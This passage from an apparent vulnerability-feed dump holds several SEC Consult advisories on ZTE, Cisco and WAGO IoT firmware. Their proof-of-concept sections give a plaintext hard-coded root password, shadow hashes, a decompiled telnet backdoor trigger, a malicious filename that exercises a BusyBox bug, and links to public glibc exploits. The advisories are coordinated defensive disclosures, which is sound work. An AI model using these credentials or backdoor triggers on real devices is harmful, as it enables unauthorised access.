numbers. \n2020-03-05: Received CVE numbers. \n2020-03-12: Coordinated release of security advisory. \n \n \nSolution: \n--------- \nUpdate the firmware of the affected devices to 1.03.18, 2.03.18 or 2.05.4. \n \nThe new versions can be downloaded from the firmware page: \nhttps://www.phoenixcontact.com/online/portal/us?1dmy&urile=wcm%3apath%3a/usen/web/main/service_and_support/application_pages/Firmware/Firmware \n \n \nWorkaround: \n----------- \nRestrict network access to the device. \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF T. Weber / @2020 \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156729/SA-20200312-0.txt", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-08-29T17:44:38", "description": "", "cvss3": {}, "published": "2020-08-27T00:00:00", "type": "packetstorm", "title": "ZTE Mobile Hotspot MS910S Backdoor / Hardcoded Password", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6301", "CVE-2013-1813", "CVE-2015-9261", "CVE-2016-2147", "CVE-2019-3422", "CVE-2017-16544", "CVE-2016-2148", "CVE-2011-5325", "CVE-2011-2716"], "modified": "2020-08-27T00:00:00", "id": "PACKETSTORM:158990", "href": "https://packetstormsecurity.com/files/158990/ZTE-Mobile-Hotspot-MS910S-Backdoor-Hardcoded-Password.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20200827-0 > \n======================================================================= \ntitle: Multiple Vulnerabilities \nproduct: ZTE mobile Hotspot MS910S \nvulnerable version: DL_MF910S_CN_EUV1.00.01 \nfixed version: - \nCVE number: CVE-2019-3422 \nimpact: High \nhomepage: https://www.zte.com.cn \nfound: 2019-09-25 \nby: Ying Shen \nT. Weber (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"ZTE Corporation is a global leader in telecommunications and information \ntechnology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock \nExchanges, the company has been committed to providing integrated end-to-end \ninnovations to deliver excellence and value to consumers, carriers, businesses \nand public sector customers from over 160 countries around the world to enable \nincreased connectivity and productivity.\" \n \nSource: https://www.zte.com.cn/global/about/corporate_information \n \n \nBusiness recommendation: \n------------------------ \nThe vendor recommends to change the hardware and use a newer product. \n \nSEC Consult recommends to remove the device from productive environments. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Hard-coded Administrator Password \nThe hard-coded administrator password was found in the ZTE mobile hotspot \nMS910S firmware version \"CN_EUV1.00.01\", which is available at. \nhttp://devicedownload.zte.com.cn/support/product/201701161506340/soft/20170116151106465.zip \n \n2) Known BusyBox Vulnerabilities \nThe used BusyBox toolkit in version 1.15.0 is outdated and contains multiple \nknown vulnerabilities. The outdated version was found by IoT Inspector. \nOne of the discovered vulnerabilities (CVE-2017-16544) was verified by using \nthe MEDUSA scalable firmware run-time. \n \n3) Known Backdoor in GoAhead Webserver \nAn unusual \"telnetd\" port was identified on an emulated device which led to the \nassumption that a backdoor can be opened via the GoAhead web-server. \nThis conclusion was done because of a blog post from another researcher: \nhttp://blog.asiantuntijakaveri.fi/2017/03/backdoor-and-root-shell-on-zte-mf286.html \n \nBy partially reverse engineering the binaries of the GoAhead webserver, the \nfunctionality described in the corresponding blog post can be underpinned. \n \nProof of concept: \n----------------- \n1) Hard-coded Administrator Password \nThe firmware file (ZTE_MF910SV1.0.1B09.bin) is using the JFFS2 filesystem which \nwas extracted. The hardcoded password can be found in the /etc/shadow file \nwithin the firmware: \n \n/_DL_MF910S_CN_EUV1.00.01.exe.extracted/Data/version/_ZTE_MF910SV1.0.1B09.bin.extracted/jffs2-root/fs_1/etc/shadow \n \nThe file content is shown below: \n------------------------------------------------------------------------------- \nroot:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: \nAdmin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: \nbin::10933:0:99999:7::: \ndaemon::10933:0:99999:7::: \nadm::10933:0:99999:7::: \nlp:*:10933:0:99999:7::: \nsync:*:10933:0:99999:7::: \nshutdown:*:10933:0:99999:7::: \nhalt:*:10933:0:99999:7::: \nuucp:*:10933:0:99999:7::: \noperator:*:10933:0:99999:7::: \nnobody::10933:0:99999:7::: \nap71::10933:0:99999:7::: \n------------------------------------------------------------------------------- \nBoth the user \"root\" and \"admin\" are using the same weak hardcoded password \n\"5up\". \n \n2) Known BusyBox Vulnerabilities \nBusyBox version 1.12.0 contains multiple CVEs like: \nCVE-2013-1813, CVE-2016-2148, CVE-2016-6301, CVE-2011-2716, CVE-2011-5325, \nCVE-2015-9261, CVE-2016-2147 and more. \n \nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on \nan emulated device. A file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was crea- \nted to trigger the vulnerability. \n \n------------------------------------------------------------------------------- \n# ls \"pressing <TAB>\" \ntest \n]55;test.txt \n# \n------------------------------------------------------------------------------- \n \n3) Known Backdoor in GoAhead Webserver \nStarting the telnet daemon on the emulated device leads to a listener on a very \nunusual port: \n[...] \n# telnetd \n#netstat -tulen \nActive Internet connections (only servers) \nProto Recv-Q Send-Q Local Address Foreign Address State \ntcp 0 0 0.0.0.0:4719 0.0.0.0:* LISTEN \n[...] \n \nBecause this seems to be not configured on the system by any file, the BusyBox \nbinary was inspected. \n \nThe pseudocode snippet of BusyBox' telnetd function that was generated by Hex- \nRays ARM Decompiler, indicated that this port was hard-coded: \n<snip> \ndword_788DC = (int)\"/bin/login\"; \ndword_788E0 = (int)\"/etc/issue.net\"; \nv3 = sub_5DBFC(a2, \"f:l:Kip:b:F\", &dword_788E0, &dword_788DC, &v76, &v75); \nv4 = v3 & 8; \nv5 = v3; \nif ( !(v3 & 8) && !(v3 & 0x40) ) \nsub_64A10(v3 & 8); \nif ( (v5 & 0x48) != 64 ) \n{ \nopenlog((const char *)dword_798DC, 1, 24); \ndword_78630 = 2; \n} \nif ( v5 & 0x10 ) \nv6 = sub_64FF8(v76); \nelse \nv6 = 4719; <------------------------------------- Port \"4719\" \nif ( !v4 ) \n{ \nv2 = sub_65578(v75, v6); \nsub_E394(v2, 1); \nsub_D9B0(v2); \ngoto LABEL_13; \n} \ndword_788D8 = (int)sub_1C480(0); \nif ( dword_788D8 ) \n{ \n<snip> \n \nThis led to the assumption that the GoAhead webserver was modified like \ndescribed in the following blog post: \nhttp://blog.asiantuntijakaveri.fi/2017/03/backdoor-and-root-shell-on-zte-mf286.html \n \nInspecting the GoAhead webserver binary reinforces this assumption. The \npseudocode was generated with Hex-Rays ARM Decompiler, like for the prior \nBusyBox binary: \n<snip> \nint __fastcall sub_21D48(int a1) \n{ \nint v1; // r5 \nconst char *v2; // r4 \n \nv1 = a1; \ncfg_get(\"debug_level\"); \nv2 = (const char *)sub_17DF0(v1, \"change_mode\", \"\"); \ncfg_set(\"login_9527\", \"1\"); \nif ( !strcmp(\"1\", v2) ) \n{ \ncfg_set(\"change_mode\", \"1\"); \ncfg_get(\"debug_level\"); \nsystem(\"mode_change 1\"); \n} \nelse if ( !strcmp(\"2\", v2) ) <--- change mode \"2\" \n{ \ncfg_get(\"debug_level\"); \nsystem(\"telnetd &\"); <--------- telnet daemon started \n} \nelse if ( !strcmp(\"3\", v2) ) \n{ \ncfg_get(\"debug_level\"); \nsystem(\"rem_start.sh &\"); \n} \nelse if ( !strcmp(\"4\", v2) ) \n{ \ncfg_get(\"debug_level\"); \nsystem(\"rem_kill.sh &\"); \n} \nelse \n{ \ncfg_set(\"change_mode\", \"0\"); \ncfg_get(\"debug_level\"); \nsystem(\"mode_change 0\"); \n} \nreturn sub_34374(v1, \"success\"); \n} \n<snip> \n \nOther scripts could also be started via the webserver, like \"rem_start.sh\". \nThis script contains the following lines: \n \n#!/bin/sh \nif ps|grep remserial \nthen \necho \"remserial is running..\" \nelse \nremserial -p 10005 -r 192.168.1.10 -s \"115200 raw\" /dev/ttyUSB0 & \nfi \n \nThat means, that a serial console with the speed of 115200 Baud on port 10005 \nis started. \n \nVulnerable / tested versions: \n----------------------------- \nThe following firmware has been tested, which was the latest version available \nduring the time of the test: \n* DL_MF910S_CN_EUV1.00.01 \n \n \nVendor contact timeline: \n------------------------ \n2019-09-30: Contacting vendor through psirt@zte.com.cn \n2019-10-10: Vendor provides initial contact. \n2019-10-14: Vendor confirmed receive of the advisory. \n2019-10-15: ZTE confirmed the hard-coded administrator password issue. The \nGoAhead webserver backdoor is still analyzed. \n2019-11-05: ZTE released a Security Bullentin that the product MF910S is \nend-of-service*. SEC Consult Vulnerability Lab added a grace \ntime of 9 months so that the hardware can be changed. \n2020-08-27: Release of security advisory. \n \n* http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1011722 \n \n \nSolution: \n--------- \nUpgrade to new hardware. \n \n \nWorkaround: \n----------- \nNone. \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF Thomas Weber / @2020 \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158990/SA-20200827-0.txt", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-09-05T23:02:41", "description": "", "cvss3": {}, "published": "2019-09-04T00:00:00", "type": "packetstorm", "title": "Cisco Device Hardcoded Credentials / GNU glibc / BusyBox", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6301", "CVE-2015-5277", "CVE-2019-5747", "CVE-2014-9984", "CVE-2014-4043", "CVE-2014-9402", "CVE-2015-9261", "CVE-2015-8779", "CVE-2016-2147", "CVE-2017-16544", "CVE-2015-8778", "CVE-2016-2148", "CVE-2017-1000366", "CVE-2014-9761", "CVE-2018-20679", "CVE-2015-1472", "CVE-2015-7547"], "modified": "2019-09-04T00:00:00", "id": "PACKETSTORM:154361", "href": "https://packetstormsecurity.com/files/154361/Cisco-Device-Hardcoded-Credentials-GNU-glibc-BusyBox.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20190904-0 > \n======================================================================= \ntitle: Multiple vulnerabilities \nproduct: Cisco RV340, Cisco RV340W, Cisco RV345, Cisco RV345P, \nCisco RV260, Cisco RV260P, Cisco RV260W, Cisco 160, \nCisco 160W \nvulnerable version: Cisco RV34X - 1.0.02.16, Cisco RV16X/26X - 1.0.00.15 \nfixed version: see \"Solution\" \nCVE number: - \nimpact: High \nhomepage: https://www.cisco.com/ \nfound: 2019-05-15 \nby: T. Weber, S. Viehb\u00f6ck (Office Vienna) \nIoT Inspector \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Securely connecting your small business to the outside world is as important \nas connecting your internal network devices to one another. Cisco Small \nBusiness RV Series Routers offer virtual private networking (VPN) technology \nso your remote workers can connect to your network through a secure Internet \npathway.\" \n \nSource: https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html \n \n \nBusiness recommendation: \n------------------------ \nWe want to thank Cisco for the very quick and professional response and great \ncoordination. Customers are urged to update the firmware of their devices. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Hardcoded Credentials \nThe device contains hardcoded users and passwords which can be used to login \nvia SSH on an emulated device at least. \n \nDuring the communication with Cisco it turned out that: \n\"Accounts like the 'debug-admin' and 'root' can not be accessed \nfrom console port, CLI or webui\". \nTherefore, these accounts had no real functionality and cannot be used for \nmalicious actions. \n \n2) Known GNU glibc Vulnerabilities \nThe used GNU glibc in version 2.19 is outdated and contains multiple known \nvulnerabilities. The outdated version was found by IoT Inspector. One of \nthe discovered vulnerabilities (CVE-2015-7547, \"getaddrinfo() buffer overflow\") \nwas verified by using the MEDUSA scalable firmware runtime. \n \n3) Known BusyBox Vulnerabilities \nThe used BusyBox toolkit in version 1.23.2 is outdated and contains multiple \nknown vulnerabilities. The outdated version was found by IoT Inspector. \nOne of the discovered vulnerabilities (CVE-2017-16544) was verified by using \nthe MEDUSA scaleable firmware runtime. \n \n \n4) Multiple Vulnerabilities - IoT Inspector Report \nFurther information can be found in IoT Inspector report: \nhttps://r.sec-consult.com/ciscoiot \n \n \nProof of concept: \n----------------- \n1) Hardcoded Credentials \nThe following hardcoded hashes were found in the 'shadow' file of the firmware: \nroot:$1$hPNSjUZA$7eKqEpqVYltt9xJ6f0OGf0:15533:0:99999:7::: \ndebug-admin:$1$.AAm0iJ4$na9wZwly9pSrdS8MhcGKw/:15541:0:99999:7::: \n[...] \n \nThe undocumented user 'debug-admin' is also contained in this file. \n \nStarting the dropbear daemon as background process on emulated firmware: \n------------------------------------------------------------------------------- \n# dropbear -E \n# [1109] <timestamp> Running in background \n# \n# [1112] <timestamp> Child connection from <IP>:52718 \n[1112] <timestamp> /var must be owned by user or root, and not writable by others \n[1112] <timestamp> Password auth succeeded for 'debug-admin' from <IP>:52718 \n------------------------------------------------------------------------------- \n \nLog on via another host connected to the same network. For this PoC the \npassword of the debug-admin was changed in the 'shadow' file. \n------------------------------------------------------------------------------- \n[root@localhost medusa]# ssh debug-admin@<IP> /bin/ash -i \ndebug-admin@<IP>'s password: \n/bin/ash: can't access tty; job control turned off \n \n \nBusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash) \n \n/tmp $ \n------------------------------------------------------------------------------- \n \nThe 'debug-admin' user has the same privileges like 'root'. This can be \ndetermined from the corresponding sudoers file in the firmware: \n[...] \n## User privilege specification \n## \nroot ALL=(ALL) ALL \ndebug-admin ALL=(ALL) ALL \n \n## Uncomment to allow members of group wheel to execute any command \n# %wheel ALL=(ALL) ALL \n[...] \n \nDuring the communication with Cisco it turned out that: \n\"Accounts like the 'debug-admin' and 'root' can not be accessed \nfrom console port, CLI or webui\". \nTherefore, these accounts had no real functionality and cannot be used for \nmalicious actions. \n \n2) Known GNU glibc Vulnerabilities \nGNU glibc version 2.19 contains multiple CVEs like: \nCVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472, \nCVE-2015-5277, CVE-2015-8778, CVE-2015-8779, CVE-2017-1000366 and more. \n \nThe getaddrinfo() buffer overflow vulnerability was checked with the help of \nthe exploit code from https://github.com/fjserna/CVE-2015-7547. It was compiled \nand executed on the emulated device to test the system. \n \n# python cve-2015-7547-poc.py & \n[1] 961 \n# chroot /medusa_rootfs/ bin/ash \n \n \nBusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash) \n \n# gdb cve-2015-7547_glibc_getaddrinfo \n[...] \n[UDP] Total Data len recv 36 \n[UDP] Total Data len recv 36 \nConnected with 127.0.0.1:41782 \n[TCP] Total Data len recv 76 \n[TCP] Request1 len recv 36 \n[TCP] Request2 len recv 36 \nCannot access memory at address 0x4 \n \nProgram received signal SIGSEGV, Segmentation fault. \n0x76f1fd58 in ?? () from /lib/libc.so.6 \n(gdb) \n \nReferences: \nhttps://security.googleblog.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html \nhttps://github.com/fjserna/CVE-2015-7547 \n \n \n3) Known BusyBox Vulnerabilities \nBusyBox version 1.23.2 contains multiple CVEs like: \nCVE-2016-2148, CVE-2016-6301, CVE-2015-9261, CVE-2016-2147, CVE-2018-20679, \nCVE-2017-16544 and CVE-2019-5747. \nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on \nan emulated device: \n \nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the \nvulnerability. \n------------------------------------------------------------------------------- \n# ls \"pressing <TAB>\" \ntest \n]55;test.txt \n# \n------------------------------------------------------------------------------- \n \n4) Multiple Vulnerabilities - IoT Inspector Report \nFurther information can be found in IoT Inspector report: \nhttps://r.sec-consult.com/ciscoiot \n \nThe summary is below: \nIoT Inspector Vulnerability #1 BusyBox CVE entries \nOutdated BusyBox version is affected by 7 published CVEs. \n \nIoT Inspector Vulnerability #2 curl CVE entries \nOutdated curl version is affected by 35 published CVEs. \n \nIoT Inspector Vulnerability #3 GNU glibc CVE entries \nOutdated GNU glibc version is affected by 44 published CVEs. \n \nIoT Inspector Vulnerability #4 GNU glibc getaddrinfo() buffer overflow \nOutdated GNU glibc version is affected by CVE-2015-7547. \n \nIoT Inspector Vulnerability #5 Hardcoded password hashes \nFirmware contains multiple hardcoded credentials. \n \nIoT Inspector Vulnerability #6 Linux Kernel CVE entries \nOutdated Linux Kernel version affected by 512 published CVEs. \n \nIoT Inspector Vulnerability #7 MiniUPnPd CVE entries \nOutdated MiniUPnPd version affected by 2 published CVEs. \n \nIoT Inspector Vulnerability #8 Dnsmasq CVE entries \nOutdated MiniUPnPd version affected by 1 published CVE. \n \nIoT Inspector Vulnerability #9 Linux Kernel Privilege Escalation \u201cpp_key\u201d \nOutdated Linux Kernel version is affected by CVE-2015-7547. \n \nIoT Inspector Vulnerability #10 OpenSSL CVE entries \nOutdated OpenSSL version affected by 6 published CVEs. \n \n \nVulnerable / tested versions: \n----------------------------- \nThe following firmware versions have been tested with IoT Inspector and \nfirmware emulation techniques: \nCisco RV340 / 1.0.02.16 \nCisco RV340W / 1.0.02.16 \nCisco RV345 / 1.0.02.16 \nCisco RV345P / 1.0.02.16 \nThe following firmware versions have been tested with IoT Inspector only: \nCisco RV260 / 1.0.00.15 \nCisco RV260P / 1.0.00.15 \nCisco RV260W / 1.0.00.15 \nCisco RV160 / 1.0.00.15 \nCisco RV160P / 1.0.00.15 \n \nThe firmware was obtained from the vendor website: \nhttps://software.cisco.com/download/home/286287791/type/282465789/release/1.0.02.16 \nhttps://software.cisco.com/download/home/286316464/type/282465789/release/1.0.00.15 \n \n \nVendor contact timeline: \n------------------------ \n2019-05-15: Contacting vendor through psirt@cisco.com. \n2019-05-16: Vendor confirmed the receipt. \n2019-05-2019-08: Periodic updates about the investigation from the vendor. \nClarification which of the reported issues will be fixed. \n2019-08-20: The vendor proposed the next possible publication date for the \nadvisory for 2019-09-04. The vendor added the RV160 and RV260 \nrouter series to be vulnerable to the same issues too. \n2019-09-04: Coordinated advisory release. \n \n \nSolution: \n--------- \nUpgrade to the newest available firmware version. \n \nAdditionally, the vendor provides the following security notice: \nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190904-sb-vpnrouter \n \n \nWorkaround: \n----------- \nNone. \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF T. Weber / @2019 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/154361/SA-20190904-0.txt", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-06-17T03:59:51", "description": "", "cvss3": {}, "published": "2019-06-13T00:00:00", "type": "packetstorm", "title": "WAGO 852 Industrial Managed Switch Series Code Execution / Hardcoded Credentials", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6301", "CVE-2015-0235", "CVE-2014-9984", "CVE-2014-4043", "CVE-2010-0296", "CVE-2013-1813", "CVE-2014-9402", "CVE-2019-12550", "CVE-2015-9261", "CVE-2012-4412", "CVE-2016-2147", "CVE-2019-12549", "CVE-2017-16544", "CVE-2010-3856", "CVE-2016-2148", "CVE-2011-5325", "CVE-2011-2716", "CVE-2014-9761", "CVE-2015-1472"], "modified": "2019-06-13T00:00:00", "id": "PACKETSTORM:153278", "href": "https://packetstormsecurity.com/files/153278/WAGO-852-Industrial-Managed-Switch-Series-Code-Execution-Hardcoded-Credentials.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20190612-0 > \n======================================================================= \ntitle: Multiple vulnerabilities \nproduct: WAGO 852 Industrial Managed Switch Series \nvulnerable version: 852-303: <v1.2.2.S0 \n852-1305: <v1.1.6.S0 \n852-1505: <v1.1.5.S0 \nfixed version: 852-303: v1.2.2.S0 \n852-1305: v1.1.6.S0 \n852-1505: v1.1.5.S0 \nCVE number: CVE-2019-12550, CVE-2019-12549 \nimpact: high \nhomepage: https://www.wago.com \nfound: 2019-03-08 \nby: T. Weber (Office Vienna) \nIoT Inspector \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"New ideas are the driving force behind our success WAGO is a family-owned \ncompany headquartered in Minden, Germany. Independently operating for three \ngenerations, WAGO is the global leader of spring pressure electrical \ninterconnect and automation solutions. For more than 60 years, WAGO has \ndeveloped and produced innovative products for packaging, transportation, \nprocess, industrial and building automation markets amongst others. Aside from \nits innovations in spring pressure connection technology, WAGO has introduced \nnumerous innovations that have revolutionized industry. Further ground-breaking \ninventions include: the WAGO-I/O-SYSTEM\u00ae, TOPJOB S\u00ae and WALL-NUTS\u00ae.\" \n \nSource: http://www.wago.us/wago/ \n \n \n \nBusiness recommendation: \n------------------------ \nSEC Consult recommends to immediately apply the available patches \nfrom the vendor. A thorough security review should be performed by \nsecurity professionals to identify further potential security issues. \n \n \nVulnerability overview/description: \n----------------------------------- \nThe industrial managed switch series 852 from WAGO is affected by multiple \nvulnerabilities such as old software components embedded in the firmware. \nFurthermore, hardcoded password hashes and credentials were also found by doing \nan automated scan with IoT Inspector. Two vulnerabilities (CVE-2017-16544 and \nCVE-2015-0235) were verified by emulating the device with the MEDUSA scaleable \nfirmware runtime. The validity of the password hashes and the embedded keys were \nalso verified by emulating the device. \n \n \n1) Known BusyBox Vulnerabilities \nThe used BusyBox toolkit in version 1.12.0 is outdated and contains multiple \nknown vulnerabilities. The outdated version was found by IoT Inspector. \nOne of the discovered vulnerabilities (CVE-2017-16544) was verified by using \nthe MEDUSA scaleable firmware runtime. \n \n2) Known GNU glibc Vulnerabilities \nThe used GNU glibc in version 2.8 is outdated and contains multiple known \nvulnerabilities. The outdated version was found by IoT Inspector. One of \nthe discovered vulnerabilities (CVE-2015-0235, \"GHOST\") was verified by \nusing the MEDUSA scaleable firmware runtime. \n \n3) Hardcoded Credentials (CVE-2019-12550) \nThe device contains hardcoded users and passwords which can be used to login \nvia SSH and Telnet. \n \n4) Embedded Private Keys (CVE-2019-12549) \nThe device contains hardcoded private keys for the SSH daemon. The fingerprint \nof the SSH host key from the corresponding SSH daemon matches to the embedded \nprivate key. \n \n \nProof of concept: \n----------------- \n1) Known BusyBox Vulnerabilities \nBusyBox version 1.12.0 contains multiple CVEs like: \nCVE-2013-1813, CVE-2016-2148, CVE-2016-6301, CVE-2011-2716, CVE-2011-5325, \nCVE-2015-9261, CVE-2016-2147 and more. \n \nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on \nan emulated device. A file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created \nto trigger the vulnerability. \n \n------------------------------------------------------------------------------- \n# ls \"pressing <TAB>\" \ntest \n]55;test.txt \n# \n------------------------------------------------------------------------------- \n \n \n2) Known GNU glibc Vulnerabilities \nGNU glibc version 2.8 contains multiple CVEs like: \nCVE-2010-0296, CVE-2010-3856, CVE-2012-4412, CVE-2014-4043, CVE-2014-9402, \nCVE-2014-9761, CVE-2014-9984, CVE-2015-1472 and more. \n \nThe gethostbyname buffer overflow vulnerability (GHOST) was checked with the help \nof the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was compiled \nand executed on the emulated device to test the system. \n \n \n3) Hardcoded Credentials (CVE-2019-12550) \nThe following credentials were found in the 'passwd' file of the firmware: \n<Password Hash> <Plaintext> <User> \n<removed> <removed> root \nNo password is set for the account [EMPTY PASSWORD] admin \n \nBy using these credentials, it's possible to connect via Telnet and SSH on the \nemulated device. Example for Telnet: \n------------------------------------------------------------------------------- \n[root@localhost ~]# telnet 192.168.0.133 \nTrying 192.168.0.133... \nConnected to 192.168.0.133. \nEscape character is '^]'. \n \nL2SWITCH login: root \nPassword: \n~ # \n------------------------------------------------------------------------------- \nExample for SSH: \n------------------------------------------------------------------------------- \n[root@localhost ~]# ssh 192.168.0.133 \nroot@192.168.0.133's password: \n~ # \n------------------------------------------------------------------------------- \n \n \n4) Embedded Private Keys (CVE-2019-12549) \nThe following host key fingerprint is shown by accessing the SSH daemon on \nthe emulated device: \n \n[root@localhost ~]# ssh 192.168.0.133 \nThe authenticity of host '192.168.0.133 (192.168.0.133)' can't be established. \nRSA key fingerprint is SHA256:X5Vr0/x0/j62N/aqZmHz96ojwl8x/I8mfzuT8o6uZso. \nRSA key fingerprint is MD5:2e:65:85:fc:45:04:bd:68:30:74:51:45:7d:2f:95:e2. \n \nThis matches the embedded private key (which has been removed from this advisory): \nSSH Fingerprint: 2e:65:85:fc:45:04:bd:68:30:74:51:45:7d:2f:95:e2 \n \n \nVulnerable / tested versions: \n----------------------------- \nAccording to the vendor, the following versions are affected: \n* 852-303: <v1.2.2.S0 \n* 852-1305: <v1.1.6.S0 \n* 852-1505: <v1.1.5.S0 \n \n \nVendor contact timeline: \n------------------------ \n2019-03-12: Contacting VDE CERT through info@cert.vde.com, received confirmation \n2019-03-26: Asking for a status update, VDE CERT is still waiting for details \n2019-03-28: VDE CERT requests information from WAGO again \n2019-04-09: Asking for a status update \n2019-04-11: VDE CERT: patched firmware release planned for end of May, requested \npostponement of advisory release \n2019-04-16: VDE CERT: update regarding affected firmware versions \n2019-04-24: Confirming advisory release for beginning of June \n2019-05-20: Asking for a status update \n2019-05-22: VDE CERT: no news from WAGO yet, 5th June release date \n2019-05-29: Asking for a status update \n2019-05-29: VDE CERT: detailed answer from WAGO, patches will be published \non 7th June, SEC Consult proposes new advisory release date for \n12th June \n2019-06-07: VDE CERT provides security advisory information from WAGO; \nWAGO releases security patches \n2019-06-12: Coordinated release of security advisory \n \n \nSolution: \n--------- \nThe vendor provides patches to their customers at their download page. The \nfollowing versions fix the issues: \n* 